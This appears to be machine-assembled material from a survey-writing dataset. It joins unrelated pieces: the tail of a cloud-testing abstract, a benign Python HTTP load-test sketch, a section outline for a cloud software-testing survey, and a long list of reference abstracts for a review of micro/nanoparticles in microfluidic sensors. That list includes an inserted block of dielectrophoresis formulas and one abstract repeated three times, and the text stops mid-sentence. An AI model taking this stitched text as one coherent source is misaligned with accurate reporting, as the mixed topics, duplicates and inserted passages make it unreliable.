apply Dynamic Symbolic Execution (DSE), to both generate test inputs and cloud states to achieve high structural coverage. We apply our approach on some open source Azure cloud applications. The result shows that our approach automatically generates test inputs and cloud states to achieve high structural coverage of the cloud application. ---
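The measurement side of a virtualization-aware test service such as VATS can be pictured with the minimal load-generation loop below. It is a generic stand-in written with the Python standard library for the role a commercial load generator (HP LoadRunner in the VATS case study) plays; it is not VATS or LoadRunner code, and the target URL, request count, and concurrency are placeholder values. Repeating the same measurement under different virtual machine configurations is what allows the impact of those configuration parameters to be compared.

```python
# Illustrative sketch only: a generic load-generation loop standing in for the
# role of a commercial load generator. Not VATS or LoadRunner code; the URL and
# request counts are placeholders chosen for the example.

import statistics
import time
import urllib.request
from concurrent.futures import ThreadPoolExecutor


def timed_request(url):
    """Issue one HTTP GET and return its latency in milliseconds, or None on failure."""
    start = time.perf_counter()
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            resp.read()
        return (time.perf_counter() - start) * 1000.0
    except OSError:
        return None


def run_load(url, total_requests=200, concurrency=20):
    """Fire total_requests GETs at a fixed concurrency and summarize the latencies."""
    with ThreadPoolExecutor(max_workers=concurrency) as pool:
        latencies = [r for r in pool.map(timed_request, [url] * total_requests) if r is not None]
    latencies.sort()
    return {
        "completed": len(latencies),
        "failed": total_requests - len(latencies),
        "p50_ms": statistics.median(latencies) if latencies else None,
        "p95_ms": latencies[int(0.95 * (len(latencies) - 1))] if latencies else None,
    }


if __name__ == "__main__":
    # One such measurement would be taken per virtual-machine configuration under
    # test; the configurations themselves are set through the virtualization layer.
    print(run_load("http://localhost:8080/health"))
```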
Title: A Survey of Software Testing in the Cloud
Section 1: INTRODUCTION
Description 1: Provide an introduction to cloud computing and its relevance to software testing, discussing the motivations for moving software testing to the cloud and the benefits and challenges associated with it.
Section 2: CLOUD COMPUTING
Description 2: Describe cloud computing paradigms, essential characteristics, service delivery models, deployment models, and how virtualization plays a role in software testing within the cloud.
Section 3: RESEARCH METHODOLOGY
Description 3: Explain the methodology used in the research, including the aim to classify cloud-based testing activities, clarify terminology, identify gaps, and address issues in the literature.
Section 4: Categorization
Description 4: Categorize the papers reviewed based on different criteria such as test levels, test types, contributions, and associated delivery models in cloud computing.
Section 5: Gaps
Description 5: Identify gaps in existing research, particularly the lack of studies on the effects of different cloud deployment models on software testing as a service, and opportunities for further research.
Section 6: Testing for the Cloud
Description 6: Define and discuss testing activities specifically for applications developed to run on cloud platforms.
Section 7: Testing on the Cloud
Description 7: Explore testing activities for on-premise applications that utilize cloud infrastructure for testing purposes.
Section 8: RELATED WORK
Description 8: Review related research on software testing in the cloud, highlighting the absence of comprehensive literature reviews that categorize existing research by problem and solution domains.
Section 9: CONCLUSION
Description 9: Summarize the findings, emphasize open research areas, and suggest future research directions to address gaps identified in the survey.
Applications of Micro/Nanoparticles in Microfluidic Sensors: A Review
7
--- paper_title: Dispersion of carbon black in a continuous phase: Electrical, rheological, and morphological studies paper_content: This work investigates the dispersion of carbon black (CB) aggregates into various polymeric matrices to increase electric conductivity. The effect of matrix viscosity on CB morphology and, consequently, on the blend conductivity was thoroughly addressed. The electric conductivity increases from 10^-9 to 10^-4 when less than 3% CB aggregates were dispersed into the PDMS liquid of various viscosities. The CB threshold loading was found to increase from 1% to 3% as the viscosity rose from 10 cp to 60 000 cp. This finding shows that an ideal loading with CB aggregates is far below that (generally 15%) of a typical pelletized CB loading. Moreover, the microscope and RV tests reveal that CB aggregates diffuse and form an agglomerate-network when the conductivity threshold is reached in a low-viscosity matrix. However, a CB aggregate-network was observed when the threshold value was attained in a high-viscosity matrix. These two mechanisms can be distinguished at approximately 1000 cp. Finally, experimental observation shows that the increase of viscosity during curing does not influence the conductivity of the composite when the CB aggregates are dispersed in a thermoset matrix. The minimum viscosity during curing, however, was found to be critical to CB dispersion morphology and, consequently, to ultimate electric conductivity. --- paper_title: High-throughput particle manipulation by hydrodynamic, electrokinetic, and dielectrophoretic effects in an integrated microfluidic chip paper_content: Integrating different steps on a chip for cell manipulations and sample preparation is of foremost importance to fully take advantage of microfluidic possibilities, and therefore make tests faster, cheaper and more accurate. We demonstrated particle manipulation in an integrated microfluidic device by applying hydrodynamic, electroosmotic (EO), electrophoretic (EP), and dielectrophoretic (DEP) forces. The process involves generation of fluid flow by pressure difference, particle trapping by DEP force, and particle redirection by EO and EP forces. Both DC and AC signals were applied, taking advantage of DC EP, EO and AC DEP for on-chip particle manipulation. Since different types of particles respond differently to these signals, variations of DC and AC signals are capable of handling complex and highly variable colloidal and biological samples. The proposed technique can operate in a high-throughput manner with thirteen independent channels in radial directions for enrichment and separation in a microfluidic chip. We evaluated our approach by collecting Polystyrene particles, yeast cells, and E. coli bacteria, which respond differently to the electric field gradient. Live and dead yeast cells were separated successfully, validating the capability of our device to separate highly similar cells. Our results showed that this technique could achieve fast pre-concentration of colloidal particles and cells and separation of cells depending on their vitality. Hydrodynamic, DC electrophoretic and DC electroosmotic forces were used together instead of a syringe pump to achieve sufficient fluid flow and particle mobility for particle trapping and sorting. By eliminating bulky mechanical pumps, this new technique has wide applications for in situ detection and analysis.
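The preceding abstract relies on the interplay of dielectrophoretic (DEP) trapping and DC electrophoretic/electroosmotic transport. For reference, the standard dipole-approximation expressions are summarized below; these are textbook forms rather than the cited paper's notation, with r the particle radius, ε_m the medium permittivity, and ε*_p, ε*_m the complex permittivities of particle and medium.

```latex
% Textbook dipole-approximation expressions (not taken from the cited papers).
\begin{align}
  \mathbf{F}_{\mathrm{DEP}}
    &= 2\pi \varepsilon_m r^{3}\,\mathrm{Re}\!\left[K(\omega)\right]\,
       \nabla\lvert\mathbf{E}\rvert^{2},
  \qquad
  K(\omega) = \frac{\varepsilon_p^{*}-\varepsilon_m^{*}}
                   {\varepsilon_p^{*}+2\varepsilon_m^{*}},
  \qquad
  \varepsilon^{*} = \varepsilon - \mathrm{i}\,\frac{\sigma}{\omega}, \\[4pt]
  \mathbf{u}_{\mathrm{EK}}
    &= \left(\mu_{\mathrm{EO}} + \mu_{\mathrm{EP}}\right)\mathbf{E}.
\end{align}
```

Re[K(ω)] > 0 drives particles toward field maxima (positive DEP) and Re[K(ω)] < 0 toward field minima (negative DEP), which is why particles and cells of different polarizability can be trapped or passed selectively, while the DC electrokinetic term (electroosmotic plus electrophoretic mobility) provides the bulk transport.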
--- paper_title: An integrated microfluidic system for reaction, high-sensitivity detection, and sorting of fluorescent cells and particles. paper_content: Presented is a novel approach for an integrated micro total analysis system (microTAS) based on a microfluidic on-chip device that supports ultrasensitive confocal detection of fluorescent cells and particles and subsequently allows for their precise sorting in the fluid phase with respect to spectroscopic properties, such as brightness and color. The hybrid silicone elastomer/glass chip first comprises a branched channel system to initiate fluid mixing and to hydrodynamically focus the sample solution down to a thin flow layer, matching the size of the confocal detection volume placed at that position and, thus, providing a high detection efficiency. In the subsequent on-chip module, the dispersed cells or particles can be sorted into two different output channels. The sorting process is realized by a perpendicular deflection stream that can be switched electrokinetically. The performance of the automated sorting routine is demonstrated by precise partition of a mixture of differently colored fluorescent beads. Moreover, the specifically branched channel geometry allows for direct implementation of reaction steps prior to detection and sorting, which is demonstrated by inducing a selective recognition reaction between the fluorescent protein R-phycoerythrin and a mixture of live bacterial cells exhibiting or lacking the respective surface antigens. --- paper_title: Microfluidic devices fabricated in Poly(dimethylsiloxane) for biological studies paper_content: This review describes microfluidic systems in poly(dimethylsiloxane) (PDMS) for biological studies. Properties of PDMS that make it a suitable platform for miniaturized biological studies, techniques for fabricating PDMS microstructures, and methods for controlling fluid flow in microchannels are discussed. Biological procedures that have been miniaturized into PDMS-based microdevices include immunoassays, separation of proteins and DNA, sorting and manipulation of cells, studies of cells in microchannels exposed to laminar flows of fluids, and large-scale, combinatorial screening. The review emphasizes the advantages of miniaturization for biological analysis, such as efficiency of the device and special insights into cell biology. --- paper_title: Logic control of microfluidics with smart colloid. paper_content: We report the successful realization of a microfluidic chip with switching and corresponding inverting functionalities. The chips are identical logic control components incorporating a type of smart colloid, giant electrorheological fluid (GERF), which possesses reversible characteristics via a liquid-solid phase transition under external electric field. Two pairs of electrodes embedded on the sides of two microfluidic channels serve as signal input and output, respectively. One, located in the GERF micro-channel, is used to control the flow status of GERF, while another one in the other micro-fluidic channel is used to detect the signal generated with a passing-by droplet (defined as a signal droplet). Switching of the GERF from the suspended state (off-state) to the flowing state (on-state) or vice versa in the micro-channel is controlled by the appearance of signal droplets whenever they pass through the detection electrode. The output on-off signals can be easily demonstrated, clearly matching with GERF flow status.
Our results show that such a logic switch is also a logic IF gate, while its inverter functions as a NOT gate. --- paper_title: Polydimethylsiloxane-based conducting composites and their applications in microfluidic chip fabrication. paper_content: This paper reviews the design and fabrication of polydimethylsiloxane (PDMS)-based conducting composites and their applications in microfluidic chip fabrication. Owing to their good electrical conductivity and rubberlike elastic characteristics, these composites can be used variously in soft-touch electronic packaging, planar and three-dimensional electronic circuits, and in-chip electrodes. Several microfluidic components fabricated with PDMS-based composites have been introduced, including a microfluidic mixer, a microheater, a micropump, a microdroplet controller, as well as an all-in-one microfluidic chip. --- paper_title: Nanocomposite Carbon‐PDMS Material for Chip‐Based Electrochemical Detection paper_content: This paper presents an alternative approach to create low-cost and patternable carbon electrodes suitable for microfluidic devices. The fabrication and the electrochemical performances of electrodes made of Polydimethylsiloxane doped with commercially available carbon black (C-PDMS) are described. Conductivity and electrochemical measurements performed on various carbon to PDMS ratios showed that electrodes with suitable electrochemical properties were obtained with a ratio of 25 %. --- paper_title: Characterizing and Patterning of PDMS-Based Conducting Composites** paper_content: In recent years, there has been considerable progress on fabricating microfluidic devices with multiple functionalities, with the goal of attaining lab-on-a-chip [1–3] integration. These efforts have benefited from the development of microfabrication technologies such as soft lithography. [4] In this context the material polydimethylsiloxane (PDMS) has played an important role, not only serving as the stamp for pattern transfer, but also as an unique material in chip fabrication owing to its properties such as transparency, biocompatibility, and good flexibility. [5] Because such microfluidic devices may be constructed using simple manufacturing techniques such as micromolding, they are generally inexpensive to produce. By employing PDMS, micropumps, valves, mixer/reactors, and other components have been integrated into all-in-one chips with complex functionalities, used in chemical reactions, bio-analysis, drug discovery, etc. [2] However, PDMS is a non-conducting polymer, on which patterning metallic structures during the fabrication of microdevices is challenging due to the weak adhesion between the metal and PDMS. Hence, the integration of conducting structures into bulk PDMS has been a critical issue, especially for those applications such as electrokinetic micropumps, microsensors, microheaters, electro-rheological (ER) actuators, etc., [6–8] which require electrodes for control and signal detection. Patterning metallic structures is popular in microelectronics, but the metals cannot adhere to PDMS strongly due to the low surface energy of PDMS. Lee et al. reported the transfer and subsequent embedding of thin films of gold patterns into PDMS via chemical adhesion mediated by a silane coupling agent. [9] Lim et al. [10] developed a method of transferring and stacking metal layers onto a PDMS substrate by using serial and selective etching techniques. 
However, the incompatibility between PDMS and the metal usually caused failures in the fabrication process, especially in the bonding of thin layers. To minimize the difference in material properties, other conductive materials were considered. Gawron et al. reported the embedding of thin carbon fibers into PDMS-based microchips for capillary electrophoresis detection. [11] Carbon --- paper_title: A Simple Water-Based Synthesis of Au Nanoparticle/PDMS Composites for Water Purification and Targeted Drug Release paper_content: AuNP/PDMS nanocomposites have been synthesized in the form of gels, foams, and films with distinctive structure and morphology. A simple in situ process in aqueous medium for the formation of such composite materials is described. The nanoparticles are held firmly within the PDMS while still being chemically accessible to substances soluble in PDMS. We demonstrate the utility of this property for water purification applications such as removing aromatic solvents and sulfur-containing contaminants from water. The contaminants can be freed from the composite with a simple thermal treatment, allowing the material to be reused. We also demonstrate chemically selective uptake and release of a fluorescent dye by the nanocomposite as a drug delivery model system. --- paper_title: Electrical conductivity and Young's modulus of flexible nanocomposites made by metal ion implantation of Polydimethylsiloxane: the relationship between nanostructure and macroscopic properties paper_content: The mechanical and electrical properties of nanocomposites created by gold and titanium implantation into Polydimethylsiloxane (PDMS) are reported for doses from 10^15 at/cm^2 to 5×10^16 at/cm^2, and for ion energies of 2.5 keV, 5 keV and 10 keV. TEM cross-section micrographs allowed detailed microstructural analysis of the implanted layers. Gold ions penetrate up to 30 nm and form crystalline nanoparticles whose size increases with ion dose and energy. Titanium forms a nearly homogeneous amorphous composite with the PDMS up to 18 nm thick. Using TEM micrographs, the metal volume fraction of the composite was accurately determined, allowing both electrical conductivity and the Young's modulus to be plotted vs. the volume fraction, enabling quantitative use of percolation theory for nanocomposites less than 30 nm in thickness. This allows linking the composite's Young's modulus and conductivity directly to the implantation parameters and volume fraction. Electrical and mechanical properties were measured on the same nanocomposite samples, and different percolation thresholds and exponents were found, showing that while percolation explains very well both conduction and stiffness of the composite, the interaction between metal nanoparticles occurs differently for determining mechanical and electrical properties. --- paper_title: Polydimethylsiloxane-based conducting composites and their applications in microfluidic chip fabrication. paper_content: This paper reviews the design and fabrication of polydimethylsiloxane (PDMS)-based conducting composites and their applications in microfluidic chip fabrication. Owing to their good electrical conductivity and rubberlike elastic characteristics, these composites can be used variously in soft-touch electronic packaging, planar and three-dimensional electronic circuits, and in-chip electrodes.
Several microfluidic components fabricated with PDMS-based composites have been introduced, including a microfluidic mixer, a microheater, a micropump, a microdroplet controller, as well as an all-in-one microfluidic chip. --- paper_title: Microdroplet-based universal logic gates by electrorheological fluid paper_content: We demonstrate a uniquely designed microfluid logic gate with universal functionality, which is capable of conducting all 16 logic operations in one chip, with different input voltage combinations. A kind of smart colloid, giant electrorheological (GER) fluid, functions as the translation media among fluidic, electronic and mechanic information, providing us with the capability of performing large integrations either on-chip or off-chip, while the on-chip hybrid circuit is formed by the interconnection of the electric components and fluidic channels, where the individual microdroplets travelling in a channel represents a bit. The universal logic gate reveals the possibilities of achieving a large-scale microfluidic processor with more complexity for on-chip processing for biological, chemical as well as computational experiments. --- paper_title: Electrorheological-fluid-based microvalves paper_content: We present the successful design and fabrication of push-and-pull microvalves that use a giant electrorheological (GER) fluid. Our multilayer microvalves, including the GER fluid control channel, the electrode, the flow channel, and the flexible membrane, are fabricated with polydimethylsioxane-based materials by soft lithography techniques. The GER effect is able to provide high-pressure changes in GER control channel so as to fully close and open an associated flow channel. The fast response time of the GER fluid and the push-and-pull valve design adopted assure fast switching time of the valve less than 10ms and sound reliability. This GER-fluid-based microvalve has other advantages of easy fabrication and biocompatibility and is suitable for most microfluidic applications. --- paper_title: Universal logic gates via liquid-electronic hybrid divider paper_content: We demonstrated two-input microdroplet-based universal logic gates using a liquid-electronic hybrid divider. All 16 Boolean logic functions have been realized by manipulating the applied voltages. The novel platform consists of a microfluidic chip with integrated microdroplet detectors and external electronic components. The microdroplet detectors act as the communication media for fluidic and electronic information exchange. The presence or absence of microdroplets at the detector translates into the binary signal 1 or 0. The embedded micro-mechanical pneumatically actuated valve (PAV), fabricated using the well-developed multilayer soft lithography technique, offers biocompatibility, flexibility and accuracy for the on-chip realization of different logic functions. The microfluidic chip can be scaled up to construct large-scale microfluidic logic computation. On the other hand, the microfluidic chip with a specific logic function can be applied to droplet-based chemical reactions for on-demand bio or chemical analysis. Our experimental results have presented an autonomously driven, precision-controlled microfluidic chip for chemical reactions based on the IF logic function. --- paper_title: Polydimethylsiloxane-integratable micropressure sensor for microfluidic chips. paper_content: A novel microfluidic pressure sensor which can be fully integrated into polydimethylsiloxane (PDMS) is reported. 
The sensor produces electrical signals directly. We integrated PDMS-based conductive composites into a 30 μm thick membrane and bonded it to the microchannel side wall. The response time of the sensor is approximately 100 ms and can work within a pressure range as wide as 0–100 kPa. The resolution of this micropressure sensor is generally 0.1 kPa but can be increased to 0.01 kPa at high pressures as a result of the quadratic relationship between resistance and pressure. The PDMS-based nature of the sensor ensures its perfect bonding with PDMS chips, and the standard photolithographic process of the sensor allows one-time fabrication of three dimensional structures or even microsensor arrays. The theoretical calculations are in good agreement with experimental observations. --- paper_title: Electrorheological fluid-actuated microfluidic pump paper_content: The authors report the design and implementation of an electrorheological (ER) fluid-actuated microfluidic pump, with programmable digital control. Our microfluidic pump has a multilayered structure fabricated on polydimethylsiloxane by soft-lithographic technique. The ER microfluidic pump exhibits good performance at high pumping frequencies and uniform liquid flow characteristics. It can be easily integrated with other microfluidic components. The programmable control also gives the device flexibility in its operations. --- paper_title: Active microfluidic mixer chip paper_content: We report the design and fabrication of a chaotic mixer based on the electrorheological (ER) fluid-controlled valves. The flow in the main channel is perturbed by liquid flow in orthogonal side channels, driven by hydrodynamic pulsating pumps. Each pulsating pump consists of a chamber with diaphragm plus two out-of-phase ER valves operating in a push-pull mode. All the valves, pumps, and mixing channels are integrated in one polydimethylsioxane chip. Mixing characteristics in the main channel are controlled by the strength and frequency of external electric fields applied on the ER fluid. --- paper_title: Electrorheological fluids: smart soft matter and characteristics paper_content: An electrorheological fluid, a special type of suspension with controllable fluidity by an electric field, generally contains semiconducting or polarizable materials as electro-responsive parts. These materials align in the direction of the applied electric field to generate a solid-like phase in the suspension. These electro-responsive smart materials, including dielectric inorganics, semiconducting polymers and their hybrids, and polymer/inorganic composites, are reviewed in terms of their mechanism, rheological analysis and dielectric characteristics. --- paper_title: The giant electrorheological effect in suspensions of nanoparticles paper_content: Electrorheology (ER) denotes the control of a material's flow properties (rheology) through an electric field1,2,3,4,5,6,7,8,9,10. We have fabricated electrorheological suspensions of coated nanoparticles that show electrically controllable liquid–solid transitions. The solid state can reach a yield strength of 130 kPa, breaking the theoretical upper bound on conventional ER static yield stress that is derived on the general assumption that the dielectric and conductive responses of the component materials are linear. In this giant electrorheological (GER) effect, the static yield stress displays near-linear dependence on the electric field, in contrast to the quadratic variation usually observed11,12,13,14,15,16. 
Our GER suspensions show low current density over a wide temperature range of 10–120 °C, with a reversible response time of <10 ms. Finite-element simulations, based on the model of saturation surface polarization in the contact regions of neighbouring particles, yield predictions in excellent agreement with experiment. --- paper_title: Review Article—Dielectrophoresis: Status of the theory, technology, and applications paper_content: A review is presented of the present status of the theory, the developed technology and the current applications of dielectrophoresis (DEP). Over the past 10 years around 2000 publications have addressed these three aspects, and current trends suggest that the theory and technology have matured sufficiently for most effort to now be directed towards applying DEP to unmet needs in such areas as biosensors, cell therapeutics, drug discovery, medical diagnostics, microfluidics, nanoassembly, and particle filtration. The dipole approximation to describe the DEP force acting on a particle subjected to a nonuniform electric field has evolved to include multipole contributions, the perturbing effects arising from interactions with other cells and boundary surfaces, and the influence of electrical double-layer polarizations that must be considered for nanoparticles. Theoretical modelling of the electric field gradients generated by different electrode designs has also reached an advanced state. Advances in the technology include the development of sophisticated electrode designs, along with the introduction of new materials (e.g., silicone polymers, dry film resist) and methods for fabricating the electrodes and microfluidics of DEP devices (photo and electron beam lithography, laser ablation, thin film techniques, CMOS technology). Around three-quarters of the 300 or so scientific publications now being published each year on DEP are directed towards practical applications, and this is matched with an increasing number of patent applications. A summary of the US patents granted since January 2005 is given, along with an outline of the small number of perceived industrial applications (e.g., mineral separation, micropolishing, manipulation and dispensing of fluid droplets, manipulation and assembly of micro components). The technology has also advanced sufficiently for DEP to be used as a tool to manipulate nanoparticles (e.g., carbon nanotubes, nano wires, gold and metal oxide nanoparticles) for the fabrication of devices and sensors. Most efforts are now being directed towards biomedical applications, such as the spatial manipulation and selective separation/enrichment of target cells or bacteria, high-throughput molecular screening, biosensors, immunoassays, and the artificial engineering of three-dimensional cell constructs. DEP is able to manipulate and sort cells without the need for biochemical labels or other bioengineered tags, and without contact to any surfaces. This opens up potentially important applications of DEP as a tool to address an unmet need in stem cell research and therapy. --- paper_title: A novel method to construct 3D electrodes at the sidewall of microfluidic channel paper_content: We report a simple, low-cost and novel method for constructing three-dimensional (3D) microelectrodes in microfluidic system by utilizing low melting point metal alloy. Three-dimensional electrodes have unique properties in application of cell lysis, electro-osmosis, electroporation and dielectrophoresis. 
The fabrication process involves conventional photolithography and sputtering techniques to fabricate planar electrodes, positioning bismuth (Bi) alloy microspheres at the sidewall of the PDMS channel, plasma bonding and low temperature annealing to improve electrical connection between metal microspheres and planar electrodes. Compared to other fabrication methods for 3D electrodes, the presented one does not require rigorous experimental conditions, cumbersome processes and expensive equipment. Numerical analysis of the electric field distribution with different electrode configurations was presented to verify the unique field distribution of arc-shaped electrodes. The application of the 3D electrode configuration with highly conductive alloy microspheres was confirmed by particle manipulation based on dielectrophoresis. The proposed technique offers alternatives to construct 3D electrodes from 2D electrodes. More importantly, the simplicity of the fabrication process provides easy ways to quickly fabricate electrodes with arc-shaped geometry at the sidewall of the microchannel. --- paper_title: Continuous manipulation and separation of particles using combined obstacle- and curvature-induced direct current dielectrophoresis paper_content: This paper presents a novel dielectrophoresis-based microfluidic device incorporating round hurdles within an S-shaped microchannel for continuous manipulation and separation of microparticles. Local nonuniform electric fields are generated due to the combined effects of obstacle and curvature, which in turn induce negative dielectrophoresis forces exerted on the particles that transport throughout the microchannel electrokinetically. Experiments were conducted to demonstrate the controlled trajectories of fixed-size (i.e. 10 or 15 μm) polystyrene particles, and size-dependent separation of 10 and 15 μm particles by adjusting the applied voltages at the inlet and outlets. Numerical simulations were also performed to predict the particle trajectories, which showed reasonable agreement with experimentally observed results. Compared to other microchannel designs that make use of either obstacle or curvature individually for inhomogeneous electric fields, the developed microchannel offers advantages such as improved controllability of particle motion, lower requirement of applied voltage, reduced fouling and particle adhesion, etc. --- paper_title: Continuous particle focusing in a waved microchannel using negative dc dielectrophoresis paper_content: We present a waved microchannel for continuous focusing of microparticles and cells using negative direct current (dc) dielectrophoresis. The waved channel is composed of consecutive s-shaped curved channels in series to generate an electric field gradient required for the dielectrophoretic effect. When particles move electrokinetically through the channel, the experienced negative dielectrophoretic forces alternate directions within two adjacent semicircular microchannels, leading to a focused continuous-flow stream along the channel centerline. Both the experimentally observed and numerically simulated results of the focusing performance are reported, which coincide acceptably in proportion to the specified dimensions (i.e. inlet and outlet of the waved channel). How the applied electric field, particle size and medium concentration affect the performance was studied by focusing polystyrene microparticles of varying sizes.
As an application in the field of biology, the focusing of yeast cells in the waved mcirochannel was tested. This waved microchannel shows a great potential for microflow cytometry applications and is expected to be widely used before different processing steps in lab-on-a-chip devices with integrated functions. --- paper_title: Polydimethylsiloxane-based conducting composites and their applications in microfluidic chip fabrication. paper_content: This paper reviews the design and fabrication of polydimethylsiloxane (PDMS)-based conducting composites and their applications in microfluidic chip fabrication. Owing to their good electrical conductivity and rubberlike elastic characteristics, these composites can be used variously in soft-touch electronic packaging, planar and three-dimensional electronic circuits, and in-chip electrodes. Several microfluidic components fabricated with PDMS-based composites have been introduced, including a microfluidic mixer, a microheater, a micropump, a microdroplet controller, as well as an all-in-one microfluidic chip. --- paper_title: Valveless impedance micropump with integrated magnetic diaphragm. paper_content: This study presents a planar valveless impedance-based micropump for biomedical applications comprising a lower glass substrate patterned with a copper micro-coil, a microchannel, an upper glass cover plate, and a PDMS diaphragm with an electroplated magnet on its upper surface. When a current is passed through the micro-coil, an electromagnetic force is established between the coil and the magnet. The resulting deflection of the PDMS diaphragm creates an acoustic impedance mismatch within the microchannel, which in turn produces a net flow. The performance of the micropump is characterized experimentally. The experimental results show that a maximum diaphragm deflection of 30 microm is obtained when the micro-coil is supplied with an input current of 0.5 A. The corresponding flow rate is found to be 1.5 microl/sec when the PDMS membrane is driven by an actuating frequency of 240 Hz. --- paper_title: Magnetically Actuated Patterns for Bioinspired Reversible Adhesion (Dry and Wet) paper_content: DOI: 10.1002/adma.201303087 Over the last decade the unique “strong but reversible” characteristics of gecko’s and tree frog’s adhesive pads have been intensively investigated both in the natural systems and artificial mimics.[1,2] Whereas adhesive strength in the natural systems has been matched and even surpassed with synthetic micro and nanostructured surfaces,[3,4] strategies to effectively switch between adhesive and non adhesive states, drastically or gradually, are still scarce and limited either in performance or by the complexity of the preparation method.[5–9] Reversibility in patterned adhesives relies on a significant surface pattern reorganisation via application of an external stimulus. In artificial systems this has been achieved by temperature changes using patterns of responsive polymer materials (shape memory polymers[5] and liquid crystalline polymers[6]) or by mechanical stretching of wrinkled patterns supported by elastomeric films.[7–9] Switching adhesion with temperature based methods is slow and cannot be tuned. Adhesion changes by mechanical forces only work on stretchable films and the principle is not applicable when these are supported by rigid solids.[7–9] Methods for reversible and tunable adhesion controlled by noncontact external stimuli (temperature, light, etc.) remain a scientific and technical challenge. 
Polymer-based magnetically actuated microcomponents have been reported to undergo predesigned, complex two- and three-dimensional motions upon application of magnetic fields.[10–12] Elastomeric materials filled with magnetic nanoparticles shaped in different microgeometries by soft moulding methods have been reported, including pillar patterns.[11,13–15] These structures have been applied in microfluidics,[15] for inducing localized traction forces on cells[11,13] and to generate anisotropic motion of microsized objects.[10] However, all these examples are based on either small movements or movement of isolated components. None of the reported cases allow homogeneous, robust and strong magnetically driven movement of microcomponents over large areas, which is a prerequisite for efficient switching of adhesion on structured surfaces. Here we report on a facile strategy to obtain magnetically actuated arrays of micropillars able to undergo reversible, homogeneous, drastic and tunable geometrical changes upon application of a magnetic field with variable strength. We demonstrate, for the first time, a magnetically tunable adhesive that works under dry and wet conditions. Arrays of magnetic micropillars with 47 μm height and 18 μm diameter were obtained by soft moulding[16–18] using PDMS precursors containing NdFeB microparticles (see Figure 1 and Experimental Section for details). A drop of magnetic PDMS precursor was cast on the mould and a suitable magnetic field gradient was applied by placing the mould on top of a permanent magnet. In this way, the microparticles accumulated inside the pillars, where the magnetic field gradient was stronger (Figure 1, step 1). This step was crucial for a homogeneous and strong magnetic response of the pillars across the pattern. The residual magnetic PDMS layer on the mould was scraped off and a previously cured PDMS thin film was pressed against the mould (Figure 1, step 2). A non-magnetic backing layer is important in order to avoid interfering magnetic interaction with the pillars. The sandwich PDMS mould/PDMS-NdFeB/PDMS film (Figure 1) was cured in an oven and then placed in a strong homogeneous magnet for magnetizing the embedded NdFeB particles (Figure 1, step 3). Control patterns were also prepared where the magnetization step was omitted. After demoulding, homogeneous arrays of magnetic micropillars supported by a non-magnetic backing layer were obtained (Supporting Information (SI) Figure SI-1). The microparticles were homogeneously distributed along the pillars, as observed by optical microscopy (Figure 1). Alternatively, the sandwich PDMS mould/PDMS-NdFeB/PDMS film was magnetized before curing and then placed on a magnet in order to attract the highly magnetized microparticles in the fluid PDMS to the top of the pillars (Figure SI-2). However, in this case irreversible sticking of neighbouring pillars was typically observed after demoulding. This was a consequence of the high concentration of magnetized particles at the top of the pillars, which makes neighbouring pillars behave like two interacting micromagnets (Figure SI-3). For this reason this method was rejected in the following studies. In order to test the magnetic response of the micropillars, a cylindrical NdFeB permanent magnet mounted on a micromanipulator was brought close to the sample (Figure SI-4) and the response of the micropillars was followed by optical microscopy.
Micropillars bent and rotated about their own axes when the magnet approached the sample and was moved around it (Figure 2A, SI-movie 1). The movement was homogeneous across the pattern (SI-movie 2). At stronger field gradients, a more pronounced bending and contact between pillars (Figure 2B1, SI-movie 3) or contact between the upper part of the pillar and the backing layer of the array (Figure 2B2, SI-movie 4 and 5) was observed depending on the bending direction of the pillars. When the magnet was removed, the pillars returned to their initial positions. --- paper_title: Application of magnetorheological elastomer to vibration absorber paper_content: The traditional dynamic vibration absorber (DVA) is widely used in industry as vibration absorption equipment. However, it is only effective over a narrow working frequency range. This shortcoming has limited its stability and application. This paper develops an adaptive tuned vibration absorber (ATVA) based on the unique characteristics of magnetorheological elastomers (MREs), whose modulus can be controlled by an applied magnetic field. This ATVA works in shear mode and consists of a dynamic mass, a static mass and smart spring elements made of MREs. Based on the double pole model of MR effects, the frequency-shift capability of the ATVA has been theoretically and experimentally evaluated. The experimental results demonstrated that the natural frequency of the ATVA can be tuned from 27.5 Hz to 40 Hz. To study its vibration absorption capacity, a beam structure supported at both ends has been employed, and a dynamic model coupling the beam and the absorber has been established. Both the calculation and experimental results show that the absorption capacity of the developed ATVA is better than that of the traditional TVA and can reach as high as 25 dB, which was confirmed by experiment. --- paper_title: Magnetic field sensitive functional elastomers with tuneable elastic modulus paper_content: The main purpose of the present work was to establish the effect of external magnetic field on the elastic modulus. We have prepared poly(dimethyl siloxane) networks loaded with randomly distributed carbonyl iron particles. It was found, that the elastic modulus of magnetoelasts could be increased by uniform magnetic field. In order to enhance the magnetic reinforcement effect, we have prepared anisotropic samples under uniform magnetic field. This procedure results in formation of chain-like structures from the carbonyl iron particles aligned parallel to the field direction. The effect of particle concentration, the intensity of uniform magnetic field as well as the spatial distribution of particles on the magnetic field induced excess modulus were studied. It was established that the uniaxial field structured composites exhibit larger excess modulus compared to the random particle dispersions. The most significant effect was found if the applied field is parallel to the particle alignment and to the mechanical stress. A phenomenological approach was proposed to describe the dependence of elastic modulus on the magnetic induction. The magnetic field sensitive soft materials with tuneable elastic properties may find usage in elastomer bearings and vibration absorber. --- paper_title: Shear properties of a magnetorheological elastomer paper_content: This paper presents an experiment testing the damped free vibration of a system composed of a magnetorheological elastomer and a mass.
The goal of this experiment was to obtain the dependence of the natural frequency and the damping ratio of the structure on the applied magnetic field. The shear properties, including the shear storage modulus and the damping factor, were therefore determined. The experimental results revealed that the shear storage modulus could reach a value of 60% of the zero-field modulus and was dominated by the magnetic field, but the change in the damping factor could be neglected. Furthermore, when the field was moderate and saturation did not occur, the shear storage modulus increased proportionally with the applied field. This interesting phenomenon was analysed, and it is suggested that the subquadratic field dependence, which arises from the saturation of the magnetization near the poles of closely spaced pairs of spheres, must be taken into consideration. --- paper_title: Study of fluid damping effects on resonant frequency of an electromagnetically actuated valveless micropump. paper_content: As fluid flow effects on the actuation and dynamic response of a vibrating membrane are crucial to micropump design in drug delivery, this paper presents both a mathematical and finite-element analysis (FEA) validation of a solution to fluid damping of a valveless micropump model. To further understand the behavior of the micropump, effects of geometrical dimensions and properties of fluid on the resonant frequency are analyzed to optimize the design of the proposed micropump. The analytical and numerical solutions show that the resonant frequency decreases with the slenderness ratio of the diffuser and increases with the opening angle, aspect ratio, and thickness ratio between the membrane and the fluid chamber depth. A specific valveless micropump model with a 6-mm diameter and 65-μm thickness polydimethylsiloxane (PDMS) composite elastic membrane was studied and 